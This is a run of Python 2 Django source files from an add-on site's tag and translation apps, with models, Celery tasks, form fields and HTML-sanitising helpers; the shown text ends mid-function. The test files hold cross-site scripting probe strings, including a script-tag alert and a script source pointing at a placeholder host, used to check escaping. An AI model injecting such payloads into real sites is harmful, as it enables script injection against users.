def handle(self, *args, **kw):
pks = list(Tag.objects.values_list('pk', flat=True).order_by('pk'))
print "Found: %s tags to clean and adding to celery." % len(pks)
for pk in pks:
clean_tag.delay(pk)
########NEW FILE########
__FILENAME__ = models
from django.db import models
from django.core.urlresolvers import NoReverseMatch
import amo.models
from amo.urlresolvers import reverse
class TagManager(amo.models.ManagerBase):
def not_blacklisted(self):
"""Get allowed tags only"""
return self.filter(blacklisted=False)
class Tag(amo.models.ModelBase):
tag_text = models.CharField(max_length=128)
blacklisted = models.BooleanField(default=False)
restricted = models.BooleanField(default=False)
addons = models.ManyToManyField('addons.Addon', through='AddonTag',
related_name='tags')
num_addons = models.IntegerField(default=0)
objects = TagManager()
class Meta:
db_table = 'tags'
ordering = ('tag_text',)
def __unicode__(self):
return self.tag_text
@property
def popularity(self):
return self.num_addons
def can_reverse(self):
try:
self.get_url_path()
return True
except NoReverseMatch:
return False
def get_url_path(self):
return reverse('tags.detail', args=[self.tag_text])
def flush_urls(self):
urls = ['*/tag/%s' % self.tag_text, ]
return urls
def save_tag(self, addon):
tag, created = Tag.objects.get_or_create(tag_text=self.tag_text)
AddonTag.objects.get_or_create(addon=addon, tag=tag)
amo.log(amo.LOG.ADD_TAG, tag, addon)
return tag
def remove_tag(self, addon):
tag, created = Tag.objects.get_or_create(tag_text=self.tag_text)
for addon_tag in AddonTag.objects.filter(addon=addon, tag=tag):
addon_tag.delete()
amo.log(amo.LOG.REMOVE_TAG, tag, addon)
def update_stat(self):
if self.blacklisted:
return
self.num_addons = self.addons.count()
self.save()
class AddonTag(amo.models.ModelBase):
addon = models.ForeignKey('addons.Addon', related_name='addon_tags')
tag = models.ForeignKey(Tag, related_name='addon_tags')
class Meta:
db_table = 'users_tags_addons'
def flush_urls(self):
urls = ['*/addon/%d/' % self.addon_id,
'*/tag/%s' % self.tag.tag_text, ]
return urls
def update_tag_stat_signal(sender, instance, **kw):
from .tasks import update_tag_stat
if not kw.get('raw'):
try:
update_tag_stat.delay(instance.tag)
except Tag.DoesNotExist:
pass
models.signals.post_save.connect(update_tag_stat_signal, sender=AddonTag,
dispatch_uid='update_tag_stat')
models.signals.post_delete.connect(update_tag_stat_signal, sender=AddonTag,
dispatch_uid='delete_tag_stat')
########NEW FILE########
__FILENAME__ = tasks
from celeryutils import task
import commonware.log
from amo.utils import slugify
from tags.models import AddonTag, Tag
task_log = commonware.log.getLogger('z.task')
@task(rate_limit='1000/m')
def clean_tag(pk, **kw):
task_log.info("[1@%s] Cleaning tag %s" % (clean_tag.rate_limit, pk))
try:
# It could be that a previous run of this has deleted our
# tag, if so we just leave.
tag = Tag.objects.no_cache().get(pk=pk)
except Tag.DoesNotExist:
return
old = tag.tag_text
new = slugify(old, spaces=True, lower=True)
if old != new:
# Find out if there's any existing tags with this tag.
existing = (Tag.objects.no_cache().filter(tag_text=new)
.select_related()
.exclude(pk=tag.pk).order_by("pk"))
blacklisted = tag.blacklisted
if existing:
# Before deleting them, see if any AddonTags need to
# be moved over.
for existing_tag in existing:
for addon_tag in existing_tag.addon_tags.all():
if not (AddonTag.objects.no_cache()
.filter(addon=addon_tag.addon, tag=tag)
.exists()):
# If there are no tags for this addon, but there is
# for an existing and about to be deleted addon tag,
# move just one addon tag over.
addon_tag.update(tag=tag)
# If there's a tag in all this that's blacklisted, keep that
# around.
if existing_tag.blacklisted:
blacklisted = True
Tag.objects.filter(pk__in=[e.pk for e in existing]).delete()
tag.update(tag_text=new, blacklisted=blacklisted)
@task(rate_limit='10/m')
def update_all_tag_stats(pks, **kw):
task_log.info("[%s@%s] Calculating stats for tags starting with %s" %
(len(pks), update_all_tag_stats.rate_limit, pks[0]))
for tag in Tag.objects.filter(pk__in=pks):
tag.update_stat()
@task(rate_limit='1000/m')
def update_tag_stat(tag, **kw):
task_log.info("[1@%s] Calculating stats for tag %s" %
(update_tag_stat.rate_limit, tag.pk))
tag.update_stat()
########NEW FILE########
__FILENAME__ = test_helpers
from django import test
from jingo import env
from mock import Mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
from addons.models import Addon
from tags.models import AddonTag, Tag
from tags.helpers import tag_link
xss = "<script>alert('xss')</script>"
def render(s, context={}):
"""Taken from jingo.tests.utils, previously jingo.tests.test_helpers."""
t = env.from_string(s)
return t.render(context)
class TestHelpers(test.TestCase):
fixtures = ('base/addon_3615', 'base/user_2519', 'base/user_4043307',
'tags/tags')
def test_tag_list(self):
addon = Addon.objects.get(id=3615)
request = Mock()
request.user = addon.authors.all()[0]
request.groups = ()
tags = addon.tags.not_blacklisted()
ctx = {
'APP': amo.FIREFOX,
'LANG': 'en-us',
'request': request,
'addon': addon,
'tags': tags}
# no tags, no list
s = render('{{ tag_list(addon) }}', ctx)
self.assertEqual(s.strip(), "")
s = render('{{ tag_list(addon, tags=tags) }}', ctx)
assert s, "Non-empty tags must return tag list."
doc = pq(s)
eq_(doc('li').length, len(tags))
def test_helper(self):
addon = Addon.objects.get(pk=3615)
tag = addon.tags.all()[0]
tag.tag_text = xss
tag.num_addons = 1
tag.save()
doc = pq(tag_link(tag, 1, 1))
assert not doc('a')
def create_tags(addon, author, number):
for x in range(0, number):
tag = Tag.objects.create(tag_text='tag %s' % x, blacklisted=False)
AddonTag.objects.create(tag=tag, addon=addon, user=author)
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import eq_
import amo.tests
from addons.models import Addon
from tags.models import AddonTag, Tag
from tags.tasks import clean_tag
class TestTagManager(amo.tests.TestCase):
def test_not_blacklisted(self):
"""Make sure Tag Manager filters right for not blacklisted tags."""
tag1 = Tag(tag_text='abc', blacklisted=False)
tag1.save()
tag2 = Tag(tag_text='swearword', blacklisted=True)
tag2.save()
eq_(Tag.objects.all().count(), 2)
eq_(Tag.objects.not_blacklisted().count(), 1)
eq_(Tag.objects.not_blacklisted()[0], tag1)
class TestManagement(amo.tests.TestCase):
fixtures = ['base/addon_3615',
'base/addon_5369',
'tags/tags.json',
'base/user_4043307',
'base/user_2519']
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.another = Addon.objects.get(pk=5369)
def test_clean_tags(self):
start = Tag.objects.count()
caps = Tag.objects.create(tag_text='Sun')
space = Tag.objects.create(tag_text=' Sun')
clean_tag(caps.pk)
clean_tag(space.pk)
eq_(Tag.objects.count(), start)
# Just to check another run doesn't make more changes.
clean_tag(space.pk)
eq_(Tag.objects.count(), start)
def test_clean_addons_tags(self):
space = Tag.objects.create(tag_text=' Sun')
start = self.addon.tags.count()
AddonTag.objects.create(tag=space, addon=self.addon)
AddonTag.objects.create(tag=space, addon=self.another)
eq_(self.another.tags.count(), 1)
eq_(self.addon.tags.count(), start + 1)
for tag in Tag.objects.all():
clean_tag(tag.pk)
# There is ' Sun' and 'sun' on addon, one gets deleted.
eq_(self.addon.tags.count(), start)
# There is 'sun' on another, should not be deleted.
eq_(self.another.tags.count(), 1)
def test_clean_doesnt_delete(self):
space = Tag.objects.create(tag_text=' Sun')
start = self.addon.tags.count()
AddonTag.objects.create(tag=space, addon=self.another)
eq_(self.another.tags.count(), 1)
for tag in Tag.objects.all():
clean_tag(tag.pk)
# The 'sun' doesn't get deleted.
eq_(self.addon.tags.count(), start)
# There is 'sun' on another, should not be deleted.
eq_(self.another.tags.count(), 1)
def test_clean_multiple(self):
for tag in ['sun', 'beach', 'sky']:
caps = tag.upper()
space = ' %s' % tag
other = '. %s! ' % tag
for garbage in [caps, space, other]:
garbage = Tag.objects.create(tag_text=garbage)
for addon in (self.addon, self.another):
AddonTag.objects.create(tag=garbage, addon=addon)
for tag in Tag.objects.all():
clean_tag(tag.pk)
eq_(self.addon.tags.count(), 5)
eq_(self.another.tags.count(), 3)
def setup_blacklisted(self):
self.new = Tag.objects.create(tag_text=' Sun', blacklisted=True)
self.old = Tag.objects.get(tag_text='sun')
def test_blacklisted(self):
self.setup_blacklisted()
clean_tag(self.old.pk)
assert not Tag.objects.get(tag_text='sun').blacklisted
clean_tag(self.new.pk)
assert Tag.objects.get(tag_text='sun').blacklisted
def test_blacklisted_inverted(self):
self.setup_blacklisted()
clean_tag(self.new.pk)
assert Tag.objects.get(tag_text='sun').blacklisted
clean_tag(self.old.pk)
assert Tag.objects.get(tag_text='sun').blacklisted
class TestCount(amo.tests.TestCase):
fixtures = ['base/addon_3615',
'base/addon_5369',
'tags/tags.json']
exempt_from_fixture_bundling = True
def setUp(self):
self.tag = Tag.objects.get(pk=2652)
def test_count(self):
self.tag.update_stat()
eq_(self.tag.num_addons, 1)
def test_blacklisted(self):
self.tag.update(blacklisted=True, num_addons=0)
AddonTag.objects.create(addon_id=5369, tag_id=self.tag.pk)
eq_(self.tag.reload().num_addons, 0)
def test_save_tag(self):
self.tag.save_tag(addon=Addon.objects.get(pk=5369))
eq_(self.tag.reload().num_addons, 2)
def test_remove_tag(self):
self.tag.remove_tag(addon=Addon.objects.get(pk=3615))
eq_(self.tag.reload().num_addons, 0)
def test_add_addontag(self):
AddonTag.objects.create(addon_id=5369, tag_id=self.tag.pk)
eq_(self.tag.reload().num_addons, 2)
def test_delete_addontag(self):
addontag = AddonTag.objects.all()[0]
tag = addontag.tag
tag.update_stat()
eq_(tag.reload().num_addons, 1)
addontag.delete()
eq_(tag.reload().num_addons, 0)
def test_delete_tag(self):
pk = self.tag.pk
self.tag.update_stat()
self.tag.delete()
eq_(Tag.objects.filter(pk=pk).count(), 0)
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse, NoReverseMatch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
from addons.models import Addon
class TestManagement(amo.tests.TestCase):
fixtures = ['base/addon_3615',
'tags/tags.json']
def test_tags_details_view(self):
"""Test that there are some tags being shown on the details page."""
url = reverse('addons.detail_more', args=['a3615'])
r = self.client.get_ajax(url, follow=True)
doc = pq(r.content)
eq_(len(doc('li.tag')), 4)
assert 'Tags' in [d.text for d in doc('h3')]
class TestXSS(amo.tests.TestCase):
fixtures = ['base/addon_3615',
'tags/tags.json']
xss = "<script src='foo.bar'>"
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.tag = self.addon.tags.all()[0]
self.tag.tag_text = self.xss
self.tag.num_addons = 1
self.tag.save()
def test_tags_xss_detail(self):
"""Test xss tag detail."""
url = reverse('addons.detail_more', args=['a3615'])
r = self.client.get_ajax(url, follow=True)
doc = pq(r.content)
eq_(doc('li.tag')[0].text_content().strip(), self.xss)
def test_tags_xss_cloud(self):
"""Test xss tag cloud."""
url = reverse('tags.top_cloud')
r = self.client.get(url, follow=True)
doc = pq(r.content)
eq_(doc('a.tag')[0].text_content().strip(), self.xss)
class TestXSSURLFail(amo.tests.TestCase):
fixtures = ['base/addon_3615',
'tags/tags.json']
xss = "<script>alert('xss')</script>"
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.tag = self.addon.tags.all()[0]
self.tag.tag_text = self.xss
self.tag.num_addons = 1
self.tag.save()
def test_tags_xss(self):
"""Test xss tag detail."""
url = reverse('addons.detail_more', args=['a3615'])
r = self.client.get_ajax(url, follow=True)
doc = pq(r.content)
eq_(doc('li.tag')[0].text_content().strip(), self.xss)
def test_tags_xss_home(self):
"""Test xss tag home."""
self.assertRaises(NoReverseMatch, reverse,
'tags.detail', args=[self.xss])
def test_tags_xss_cloud(self):
"""Test xss tag cloud."""
self.assertRaises(NoReverseMatch, reverse,
'tags.top_cloud', args=[self.xss])
def test_no_reverse(self):
assert not self.tag.can_reverse()
class TestNoTags(amo.tests.TestCase):
fixtures = ['base/addon_3615']
def test_tags_no_details_view(self):
"""Test that there is no tag header tags being shown."""
url = reverse('addons.detail', args=['a3615'])
r = self.client.get(url, follow=True)
doc = pq(r.content)
assert 'Tags' not in [d.text for d in doc('h3')]
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url('^tags/top$', views.top_cloud, name='tags.top_cloud'),
)
########NEW FILE########
__FILENAME__ = views
from django.shortcuts import render
from tags.models import Tag
def top_cloud(request, num_tags=100):
"""Display 100 (or so) most used tags"""
"""TODO (skeen) Need to take request.APP.id into account, first
attempts to do so resulted in extreme SQL carnage
bug 556135 is open to fix"""
top_tags = Tag.objects.not_blacklisted().order_by('-num_addons')[:num_tags]
return render(request, 'tags/top_cloud.html', {'top_tags': top_tags})
########NEW FILE########
__FILENAME__ = fields
from django import forms
from django.conf import settings
from django.db import models
from django.db.models.fields import related
from django.utils import translation as translation_utils
from django.utils.translation.trans_real import to_language
from .hold import add_translation, make_key, save_translations
from .models import (Translation, PurifiedTranslation, LinkifiedTranslation,
NoLinksTranslation, NoLinksNoMarkupTranslation)
from .widgets import TransInput, TransTextarea
class TranslatedField(models.ForeignKey):
"""
A foreign key to the translations table.
If require_locale=False, the fallback join will not use a locale. Instead,
we will look for 1) a translation in the current locale and 2) fallback
with any translation matching the foreign key.
"""
to = Translation
def __init__(self, **kwargs):
# to_field: The field on the related object that the relation is to.
# Django wants to default to translations.autoid, but we need id.
options = dict(null=True, to_field='id', unique=True, blank=True,
on_delete=models.SET_NULL)
kwargs.update(options)
self.short = kwargs.pop('short', True)
self.require_locale = kwargs.pop('require_locale', True)
super(TranslatedField, self).__init__(self.to, **kwargs)
@property
def db_column(self):
# Django wants to call the db_column ('%s_id' % self.name), but our
# translations foreign keys aren't set up that way.
return self._db_column if hasattr(self, '_db_column') else self.name
@db_column.setter
def db_column(self, value):
# Django sets db_column=None to initialize it. I don't think anyone
# would set the db_column otherwise.
if value is not None:
self._db_column = value
def contribute_to_class(self, cls, name):
"""Add this Translation to ``cls._meta.translated_fields``."""
super(TranslatedField, self).contribute_to_class(cls, name)
# Add self to the list of translated fields.
if hasattr(cls._meta, 'translated_fields'):
cls._meta.translated_fields.append(self)
else:
cls._meta.translated_fields = [self]
# Set up a unique related name. The + means it's hidden.
self.rel.related_name = '%s_%s_set+' % (cls.__name__, name)
# Replace the normal descriptor with our custom descriptor.
setattr(cls, self.name, TranslationDescriptor(self))
def formfield(self, **kw):
widget = TransInput if self.short else TransTextarea
defaults = {'form_class': TransField, 'widget': widget}
defaults.update(kw)
return super(TranslatedField, self).formfield(**defaults)
def validate(self, value, model_instance):
# Skip ForeignKey.validate since that expects only one Translation when
# doing .get(id=id)
return models.Field.validate(self, value, model_instance)
class PurifiedField(TranslatedField):
to = PurifiedTranslation
class LinkifiedField(TranslatedField):
to = LinkifiedTranslation
class NoLinksField(TranslatedField):
to = NoLinksTranslation
class NoLinksNoMarkupField(TranslatedField):
to = NoLinksNoMarkupTranslation
def switch(obj, new_model):
"""Switch between Translation and Purified/Linkified Translations."""
fields = [(f.name, getattr(obj, f.name)) for f in new_model._meta.fields]
return new_model(**dict(fields))
def save_on_signal(obj, trans):
"""Connect signals so the translation gets saved during obj.save()."""
signal = models.signals.pre_save
def cb(sender, instance, **kw):
if instance is obj:
is_new = trans.autoid is None
trans.save(force_insert=is_new, force_update=not is_new)
signal.disconnect(cb)
signal.connect(cb, sender=obj.__class__, weak=False)
class TranslationDescriptor(related.ReverseSingleRelatedObjectDescriptor):
"""
Descriptor that handles creating and updating Translations given strings.
"""
def __init__(self, field):
super(TranslationDescriptor, self).__init__(field)
self.model = field.rel.to
def __get__(self, instance, instance_type=None):
if instance is None:
return self
# If Django doesn't find find the value in the cache (which would only
# happen if the field was set or accessed already), it does a db query
# to follow the foreign key. We expect translations to be set by
# queryset transforms, so doing a query is the wrong thing here.
try:
return getattr(instance, self.field.get_cache_name())
except AttributeError:
return None
def __set__(self, instance, value):
lang = translation_utils.get_language()
if isinstance(value, basestring):
value = self.translation_from_string(instance, lang, value)
elif hasattr(value, 'items'):
value = self.translation_from_dict(instance, lang, value)
# Don't let this be set to None, because Django will then blank out the
# foreign key for this object. That's incorrect for translations.
if value is not None:
# We always get these back from the database as Translations, but
# we may want them to be a more specific Purified/Linkified child
# class.
if not isinstance(value, self.model):
value = switch(value, self.model)
super(TranslationDescriptor, self).__set__(instance, value)
elif getattr(instance, self.field.attname, None) is None:
super(TranslationDescriptor, self).__set__(instance, None)
def translation_from_string(self, instance, lang, string):
"""Create, save, and return a Translation from a string."""
try:
trans = getattr(instance, self.field.name)
trans_id = getattr(instance, self.field.attname)
if trans is None and trans_id is not None:
# This locale doesn't have a translation set, but there are
# translations in another locale, so we have an id already.
translation = self.model.new(string, lang, id=trans_id)
elif to_language(trans.locale) == lang.lower():
# Replace the translation in the current language.
trans.localized_string = string
translation = trans
else:
# We already have a translation in a different language.
translation = self.model.new(string, lang, id=trans.id)
except AttributeError:
# Create a brand new translation.
translation = self.model.new(string, lang)
# A new translation has been created and it might need to be saved.
# This adds the translation to the queue of translation that need
# to be saved for this instance.
add_translation(make_key(instance), translation)
return translation
def translation_from_dict(self, instance, lang, dict_):
"""
Create Translations from a {'locale': 'string'} mapping.
If one of the locales matches lang, that Translation will be returned.
"""
from amo.utils import to_language as amo_to_language
rv = None
for locale, string in dict_.items():
loc = amo_to_language(locale)
if loc not in settings.AMO_LANGUAGES + settings.HIDDEN_LANGUAGES:
continue
# The Translation is created and saved in here.
trans = self.translation_from_string(instance, locale, string)
# Set the Translation on the object because translation_from_string
# doesn't expect Translations to be created but not attached.
self.__set__(instance, trans)
# If we're setting the current locale, set it to the object so
# callers see the expected effect.
if to_language(locale) == lang:
rv = trans
return rv
class _TransField(object):
def __init__(self, *args, **kwargs):
self.default_locale = settings.LANGUAGE_CODE
for k in ('queryset', 'to_field_name'):
if k in kwargs:
del kwargs[k]
self.widget = kwargs.pop('widget', TransInput)
super(_TransField, self).__init__(*args, **kwargs)
def clean(self, value):
errors = LocaleList()
value = dict((k, v.strip() if v else v) for (k, v) in value.items())
# Raise an exception if the default locale is required and not present
if self.default_locale.lower() not in value:
value[self.default_locale.lower()] = None
# Now, loop through them and validate them separately.
for locale, val in value.items():
try:
# Only the default locale can be required; all non-default
# fields are automatically optional.
if self.default_locale.lower() == locale:
super(_TransField, self).validate(val)
super(_TransField, self).run_validators(val)
except forms.ValidationError, e:
errors.extend(e.messages, locale)
if errors:
raise LocaleValidationError(errors)
return value
def _has_changed(self, initial, data):
# This used to be called on the field's widget and always returned False!
return False
class LocaleValidationError(forms.ValidationError):
def __init__(self, messages, code=None, params=None):
self.msgs = messages
@property
def messages(self):
return self.msgs
class TransField(_TransField, forms.CharField):
"""
A CharField subclass that can deal with multiple locales.
Most validators are run over the data for each locale. The required
validator is only run on the default_locale, which is hooked up to the
instance with TranslationFormMixin.
"""
@staticmethod
def adapt(cls, opts={}):
"""Get a new TransField that subclasses cls instead of CharField."""
return type('Trans%s' % cls.__name__, (_TransField, cls), opts)
# Subclass list so that isinstance(list) in Django works.
class LocaleList(dict):
"""
List-like objects that maps list elements to a locale.
>>> LocaleList([1, 2], 'en')
[1, 2]
['en', 'en']
This is useful for validation error lists where we want to associate an
error with a locale.
"""
def __init__(self, seq=None, locale=None):
self.seq, self.locales = [], []
if seq:
assert seq and locale
self.extend(seq, locale)
def __iter__(self):
return iter(self.zip())
def extend(self, seq, locale):
self.seq.extend(seq)
self.locales.extend([locale] * len(seq))
def __nonzero__(self):
return bool(self.seq)
def __contains__(self, item):
return item in self.seq
def zip(self):
return zip(self.locales, self.seq)
def save_signal(sender, instance, **kw):
"""
Use this signal on a model to iterate through all the translations added
to the hold queue and save them all. Hook this up to the pre_save signal
on the model.
"""
if not kw.get('raw'):
save_translations(make_key(instance))
########NEW FILE########
__FILENAME__ = forms
from django.conf import settings
from django.db import models
from django.forms.util import ErrorList
from django.utils.translation.trans_real import to_language
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from django.utils.html import conditional_escape
def default_locale(obj):
"""Get obj's default locale."""
if hasattr(obj, 'get_fallback'):
fallback = obj.get_fallback()
if isinstance(fallback, models.Field):
fallback = getattr(obj, fallback.name)
return fallback
else:
return settings.LANGUAGE_CODE
class TranslationFormMixin(object):
"""
A mixin for forms with translations that tells fields about the object's
default locale.
"""
def __init__(self, *args, **kw):
super(TranslationFormMixin, self).__init__(*args, **kw)
self.error_class = self.error_class_
self.set_default_locale()
def set_default_locale(self):
locale = to_language(default_locale(self.instance))
for field in self.fields.values():
field.default_locale = locale
field.widget.default_locale = locale
def full_clean(self):
self.set_default_locale()
return super(TranslationFormMixin, self).full_clean()
def error_class_(self, *a, **k):
return LocaleErrorList(*a, **k)
class LocaleErrorList(ErrorList):
def _errors(self):
# Pull error messages out of (locale, error) pairs.
return (e[1] if isinstance(e, tuple) else e
for e in self)
def __contains__(self, value):
return value in self._errors()
def as_ul(self):
if not self:
return u''
li = []
for item in self:
if isinstance(item, tuple):
locale, e = item
extra = ' data-lang="%s"' % locale
else:
e, extra = item, ''
li.append((extra, conditional_escape(force_unicode(e))))
return mark_safe('<ul class="errorlist">%s</ul>' %
''.join(u'<li%s>%s</li>' % x for x in li))
########NEW FILE########
__FILENAME__ = helpers
import re
from django.conf import settings
from django.utils import translation
from django.utils.translation.trans_real import to_language
from django.utils.encoding import smart_unicode
import bleach
import jinja2
import jingo
from amo.utils import clean_nl
jingo.register.filter(to_language)
@jingo.register.filter
def locale_html(translatedfield):
"""HTML attributes for languages different than the site language"""
if not translatedfield:
return ''
site_locale = translation.to_locale(translation.get_language())
locale = translation.to_locale(translatedfield.locale)
if locale == site_locale:
return ''
else:
rtl_locales = map(translation.to_locale, settings.RTL_LANGUAGES)
textdir = 'rtl' if locale in rtl_locales else 'ltr'
return jinja2.Markup(' lang="%s" dir="%s"' %
(jinja2.escape(translatedfield.locale), textdir))
@jingo.register.filter
def truncate(s, length=255, killwords=True, end='...'):
"""
Wrapper for jinja's truncate that checks if the object has a
__truncate__ attribute first.
Altering the jinja2 default of killwords=False because of
https://bugzilla.mozilla.org/show_bug.cgi?id=624642, which could occur
elsewhere.
"""
if s is None:
return ''
if hasattr(s, '__truncate__'):
return s.__truncate__(length, killwords, end)
return jinja2.filters.do_truncate(smart_unicode(s), length, killwords, end)
@jingo.register.inclusion_tag('translations/trans-menu.html')
@jinja2.contextfunction
def l10n_menu(context, default_locale='en-us', remove_locale_url=''):
"""Generates the locale menu for zamboni l10n."""
default_locale = default_locale.lower()
languages = dict((i.lower(), j) for i, j in settings.LANGUAGES.items())
c = dict(context.items())
if 'addon' in c:
remove_locale_url = c['addon'].get_dev_url('remove-locale')
c.update({'languages': languages, 'default_locale': default_locale,
'remove_locale_url': remove_locale_url})
return c
@jingo.register.filter
def all_locales(addon, field_name, nl2br=False, prettify_empty=False):
field = getattr(addon, field_name, None)
if not addon or field is None:
return
trans = field.__class__.objects.filter(id=field.id,
localized_string__isnull=False)
ctx = dict(addon=addon, field=field, field_name=field_name,
translations=trans, nl2br=nl2br, prettify_empty=prettify_empty)
t = jingo.env.get_template('translations/all-locales.html')
return jinja2.Markup(t.render(ctx))
@jingo.register.filter
def clean(string):
return jinja2.Markup(clean_nl(bleach.clean(unicode(string))).strip())
# TODO (magopian): remove this and use Django1.6 django.utils.html.remove_tags
def remove_tags(html, tags):
"""Returns the given HTML with given tags removed.
``remove_tags`` is different from ``django.utils.html.strip_tags`` which
removes each and every html tags found.
``tags`` is a space separated string of (case sensitive) tags to remove.
This is backported from Django1.6:
https://docs.djangoproject.com/en/1.6/ref/utils/
"""
tags = [re.escape(tag) for tag in tags.split()]
tags_re = '(%s)' % '|'.join(tags)
starttag_re = re.compile(r'<%s(/?>|(\s+[^>]*>))' % tags_re, re.U)
endtag_re = re.compile('</%s>' % tags_re)
html = starttag_re.sub('', html)
html = endtag_re.sub('', html)
return html
@jingo.register.filter
def no_links(string):
"""Leave text links untouched, keep only inner text on URLs."""
if not string:
return string
if hasattr(string, '__html__'):
string = string.__html__()
no_links = remove_tags(string, 'a A')
return jinja2.Markup(clean_nl(no_links).strip())
########NEW FILE########
__FILENAME__ = hold
from threading import local
from django.core.signals import request_finished
_to_save = local()
def add_translation(key, translation):
"""
Queue a translation that needs to be saved for a particular object. To
generate the key, call make_key.
"""
if not hasattr(_to_save, 'translations'):
_to_save.translations = {}
_to_save.translations.setdefault(key, [])
_to_save.translations[key].append(translation)
def clean_translations(sender, **kwargs):
"""
Removes all translations in the queue.
"""
if hasattr(_to_save, 'translations'):
_to_save.translations = {}
def make_key(obj):
"""Returns a key for this object."""
return id(obj)
def save_translations(key):
"""
For a given key, save all the translations. The key is used to ensure that
we only save the translations for the given object (and not all of them).
Once saved, they will be deleted.
"""
if not hasattr(_to_save, 'translations'):
return
for trans in _to_save.translations.get(key, []):
is_new = trans.autoid is None
trans.save(force_insert=is_new, force_update=not is_new)
if key in _to_save.translations:
del _to_save.translations[key]
# Ensure that on request completion, we flush out any unsaved translations.
request_finished.connect(clean_translations, dispatch_uid='clean_translations')
########NEW FILE########
__FILENAME__ = models
from django.db import connections, models, router
from django.db.models.deletion import Collector
from django.utils import encoding
import bleach
import commonware.log
import amo
import amo.models
from amo import urlresolvers
from . import utils
log = commonware.log.getLogger('z.translations')
class TranslationManager(amo.models.ManagerBase):
def remove_for(self, obj, locale):
"""Remove a locale for the given object."""
ids = [getattr(obj, f.attname) for f in obj._meta.translated_fields]
qs = Translation.objects.filter(id__in=filter(None, ids),
locale=locale)
qs.update(localized_string=None, localized_string_clean=None)
class Translation(amo.models.ModelBase):
"""
Translation model.
Use :class:`translations.fields.TranslatedField` instead of a plain foreign
key to this model.
"""
autoid = models.AutoField(primary_key=True)
id = models.IntegerField()
locale = models.CharField(max_length=10)
localized_string = models.TextField(null=True)
localized_string_clean = models.TextField(null=True)
objects = TranslationManager()
class Meta:
db_table = 'translations'
unique_together = ('id', 'locale')
def __unicode__(self):
return self.localized_string and unicode(self.localized_string) or ''
def __nonzero__(self):
# __nonzero__ is called to evaluate an object in a boolean context. We
# want Translations to be falsy if their string is empty.
return (bool(self.localized_string) and
bool(self.localized_string.strip()))
def __eq__(self, other):
# Django implements an __eq__ that only checks pks. We need to check
# the strings if we're dealing with existing vs. unsaved Translations.
return self.__cmp__(other) == 0
def __cmp__(self, other):
if hasattr(other, 'localized_string'):
return cmp(self.localized_string, other.localized_string)
else:
return cmp(self.localized_string, other)
def clean(self):
if self.localized_string:
self.localized_string = self.localized_string.strip()
def save(self, **kwargs):
self.clean()
return super(Translation, self).save(**kwargs)
def delete(self, using=None):
# FIXME: if the Translation is the one used as default/fallback,
# then deleting it will mean the corresponding field on the related
# model will stay empty even if there are translations in other
# languages!
cls = self.__class__
using = using or router.db_for_write(cls, instance=self)
# Look for all translations for the same string (id=self.id) except the
# current one (autoid=self.autoid).
qs = cls.objects.filter(id=self.id).exclude(autoid=self.autoid)
if qs.using(using).exists():
# If other Translations for the same id exist, we just need to
# delete this one and *only* this one, without letting Django
# collect dependencies (it'd remove the others, which we want to
# keep).
assert self._get_pk_val() is not None
collector = Collector(using=using)
collector.collect([self], collect_related=False)
# In addition, because we have FK pointing to a non-unique column,
# we need to force MySQL to ignore constraints because it's dumb
# and would otherwise complain even if there are remaining rows
# that matches the FK.
with connections[using].constraint_checks_disabled():
collector.delete()
else:
# If no other Translations with that id exist, then we should let
# django behave normally. It should find the related model and set
# the FKs to NULL.
return super(Translation, self).delete(using=using)
delete.alters_data = True
@classmethod
def _cache_key(cls, pk, db):
# Hard-coding the class name here so that subclasses don't try to cache
# themselves under something like "o:translations.purifiedtranslation".
#
# Like in ModelBase, we avoid putting the real db in the key because it
# does us more harm than good.
key_parts = ('o', 'translations.translation', pk, 'default')
return ':'.join(map(encoding.smart_unicode, key_parts))
@classmethod
def new(cls, string, locale, id=None):
"""
Jumps through all the right hoops to create a new translation.
If ``id`` is not given a new id will be created using
``translations_seq``. Otherwise, the id will be used to add strings to
an existing translation.
To increment IDs we use a setting on MySQL. This is to support multiple
database masters -- it's just crazy enough to work! See bug 756242.
"""
if id is None:
# Get a sequence key for the new translation.
cursor = connections['default'].cursor()
cursor.execute("""UPDATE translations_seq
SET id=LAST_INSERT_ID(id + @@global.auto_increment_increment)""")
# The sequence table should never be empty. But alas, if it is,
# let's fix it.
if not cursor.rowcount > 0:
cursor.execute("""INSERT INTO translations_seq (id)
VALUES(LAST_INSERT_ID(id + @@global.auto_increment_increment))""")
cursor.execute('SELECT LAST_INSERT_ID()')
id = cursor.fetchone()[0]
# Update if one exists, otherwise create a new one.
q = {'id': id, 'locale': locale}
try:
trans = cls.objects.get(**q)
trans.localized_string = string
except cls.DoesNotExist:
trans = cls(localized_string=string, **q)
return trans
class PurifiedTranslation(Translation):
"""Run the string through bleach to get a safe version."""
allowed_tags = [
'a',
'abbr',
'acronym',
'b',
'blockquote',
'code',
'em',
'i',
'li',
'ol',
'strong',
'ul',
]
allowed_attributes = {
'a': ['href', 'title', 'rel'],
'abbr': ['title'],
'acronym': ['title'],
}
class Meta:
proxy = True
def __unicode__(self):
if not self.localized_string_clean:
self.clean()
return unicode(self.localized_string_clean)
def __html__(self):
return unicode(self)
def __truncate__(self, length, killwords, end):
return utils.truncate(unicode(self), length, killwords, end)
def clean(self):
from amo.utils import clean_nl
super(PurifiedTranslation, self).clean()
cleaned = self.clean_localized_string()
self.localized_string_clean = clean_nl(cleaned).strip()
def clean_localized_string(self):
# All links (text and markup) are normalized.
linkified = urlresolvers.linkify_with_outgoing(self.localized_string)
# Keep only the allowed tags and attributes, escape the rest.
return bleach.clean(linkified, tags=self.allowed_tags,
attributes=self.allowed_attributes)
class LinkifiedTranslation(PurifiedTranslation):
"""Run the string through bleach to get a linkified version."""
allowed_tags = ['a']
class Meta:
proxy = True
class NoLinksMixin(object):
"""Mixin used to remove links (URLs and text) from localized_string."""
def clean_localized_string(self):
# First pass: bleach everything, but leave links untouched.
cleaned = super(NoLinksMixin, self).clean_localized_string()
# Second pass: call linkify to empty the inner text of all links.
emptied_links = bleach.linkify(
